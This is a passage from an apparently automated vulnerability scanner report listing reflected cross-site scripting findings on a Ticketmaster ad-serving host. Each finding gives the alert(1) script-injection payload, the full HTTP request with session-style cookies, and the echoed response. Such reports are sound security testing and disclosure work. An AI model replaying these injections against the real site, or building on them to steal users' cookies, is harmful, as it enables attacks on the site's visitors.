Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster73600"><script>alert(1)</script>cf1843363ea/LN/RTG_SX_NonSecure/503274606/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.44. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1793"><script>alert(1)</script>21638686707 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LNd1793"><script>alert(1)</script>21638686707/RTG_SX_NonSecure/1619248060/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.45. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14063"><script>alert(1)</script>f058737c3cd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom314063"><script>alert(1)</script>f058737c3cd HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LN/RTG_SX_NonSecure/1162924129/Bottom314063"><script>alert(1)</script>f058737c3cd/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.46. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a690"><script>alert(1)</script>6745bff7060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster7a690"><script>alert(1)</script>6745bff7060/172548/1739368303/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.47. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99dac"><script>alert(1)</script>68532547002 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/17254899dac"><script>alert(1)</script>68532547002/L12/79868710/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

4.48. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7f5"><script>alert(1)</script>9242a2f4cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/172548/11408426983@x011a7f5"><script>alert(1)</script>9242a2f4cf? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/2069848632/x011a7f5"><script>alert(1)</script>9242a2f4cf/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.49. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9911a"><script>alert(1)</script>84e16a5c31d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 347
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/874685307/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.50. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bff1"><script>alert(1)</script>63db032276e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 407
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/L12/841953991/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

4.51. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5039"><script>alert(1)</script>d70de5c134c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01b5039"><script>alert(1)</script>d70de5c134c? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/367540465/x01b5039"><script>alert(1)</script>d70de5c134c/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.52. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the &_RM_HTML_artist1_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82e01'-alert(1)-'e534d92780 was submitted in the &_RM_HTML_artist1_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u282e01'-alert(1)-'e534d92780&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38440
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u282e01'-alert(1)-'e534d92780';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowla
...[SNIP]...

4.53. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85730"><script>alert(1)</script>f252ad4c94c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

